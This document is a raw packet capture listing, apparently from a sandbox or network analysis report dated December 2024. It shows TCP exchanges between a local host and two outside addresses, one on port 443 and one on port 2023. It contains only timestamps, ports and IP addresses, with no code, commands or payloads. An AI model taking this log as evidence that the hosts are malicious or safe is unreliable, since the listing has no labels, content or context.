                                                                                                                  Dec 5, 2024 10:46:26.805342913 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:26.805417061 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:26.810647011 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:26.851331949 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.476408958 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.476439953 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.476488113 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:27.476497889 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.476514101 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:27.476552010 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:27.695342064 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.695358038 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.695446968 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:27.714545965 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.714680910 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:27.748018980 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.748110056 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:27.773276091 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.773416996 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:27.928917885 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.929029942 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:27.941833973 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.941927910 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:27.964101076 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.964211941 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:27.980838060 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.980992079 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:27.997617960 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:27.997745991 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.019848108 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.019958019 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.036544085 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.036640882 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.053476095 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.053555012 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.163099051 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.163192987 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.171535969 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.171617985 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.186089039 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.186178923 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.193835974 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.193945885 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.199187040 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.199263096 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.204847097 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.204972029 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.212538958 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.212600946 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.218327999 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.218400955 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.223807096 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.223890066 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.229722023 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.229801893 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.237407923 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.237505913 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.400675058 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.400774956 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.405853033 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.405935049 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.410862923 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.410947084 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.415925980 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.416013002 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.422616005 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.422688007 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.427738905 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.427815914 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.433012962 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.433084965 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.439579964 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.439654112 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.444878101 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.444956064 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.450023890 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.450134993 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.522113085 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.522223949 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.634618998 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.634733915 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.639273882 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.639359951 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.645005941 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.645087957 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.648691893 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.648766041 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.652429104 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.652573109 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.656056881 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.656116962 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.660872936 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.660954952 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.664618969 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.664710999 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.668313026 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.668386936 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.673075914 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.673146009 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.691549063 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.691648006 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.866808891 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.866909981 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.870342970 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.870421886 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.876614094 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.876696110 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.881227016 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.881287098 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.885018110 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.885118961 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.887741089 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.887825966 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.892235994 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.892415047 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.895406008 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.895503044 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.899677992 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.899765015 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.902884007 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.902975082 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.903691053 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.903755903 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.903765917 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.903835058 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:28.903847933 CET44349737202.71.109.228192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:28.903856039 CET49737443192.168.2.4202.71.109.228
                                                                                                                  Dec 5, 2024 10:46:32.979877949 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:33.100063086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:33.100152969 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:33.100384951 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:33.220170975 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:34.343281031 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:34.344274998 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:34.464003086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:34.740947008 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:34.749711990 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:34.869545937 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.199194908 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.199450016 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.199470043 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.199481964 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.199538946 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.199604988 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.199616909 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.199630022 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.199630976 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.199646950 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.199647903 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.199693918 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.206907988 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.207072973 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.207125902 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.214452982 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.215590000 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.215646982 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.320442915 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.320462942 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.320519924 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.387178898 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.387219906 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.387278080 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.391072035 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.392659903 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.392715931 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.392752886 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.402077913 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.402149916 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.402260065 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.409413099 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.409470081 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.409526110 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.417220116 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.417306900 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.417351961 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.425390005 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.425471067 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.425476074 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.433609962 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.433679104 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.433790922 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.441761017 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.441864014 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.441932917 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.450033903 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.450107098 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.450146914 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.458235979 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.458271980 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.458312035 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.465399981 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.465464115 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.465565920 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.472728014 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.472744942 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.472814083 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.578829050 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.578866005 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.579005003 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.581218958 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.581322908 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.581386089 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.586086988 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.587855101 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.587898970 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.587945938 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.592762947 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.592808008 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.592899084 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.597611904 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.597644091 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.597683907 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.602411985 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.602480888 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.602484941 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.607160091 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.607212067 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.607251883 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.611443996 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.611511946 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.611538887 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.615780115 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.615897894 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.616199017 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.620135069 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.620199919 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.620239019 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.624480963 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.624558926 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.624705076 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.628716946 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.628772020 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.628822088 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.632998943 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.633069038 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.633094072 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.637341022 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.637382030 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.637456894 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.641690016 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.641705036 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.641750097 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.646085978 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.646135092 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.646167040 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.650902033 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.650965929 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.650983095 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.654906988 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.654928923 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.654952049 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.658951044 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.659008980 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.659015894 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.663180113 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.663225889 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.663284063 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.667589903 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.667606115 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.667638063 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.671889067 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.671926975 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.671962023 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.676199913 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.676223993 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.676244020 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.698777914 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.698848963 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.772006989 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.772139072 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.772212982 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.773749113 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.773905039 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.773996115 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.777403116 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.777477026 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.777518034 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.781080961 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.781265974 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.781302929 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.785161972 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.785234928 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.785321951 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.789036989 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.789066076 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.789175034 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.792496920 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.792628050 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.792706966 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.795397997 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.795479059 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.795567036 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.798228979 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.798307896 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.798347950 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.801471949 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.801599979 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.801645041 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.804658890 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.804766893 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.804816008 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.807766914 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.807854891 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.808094025 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.811054945 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.811074972 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.811134100 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.814007044 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.814078093 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.814122915 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:35.817244053 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.817297935 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:35.817349911 CET497382023192.168.2.445.149.241.141
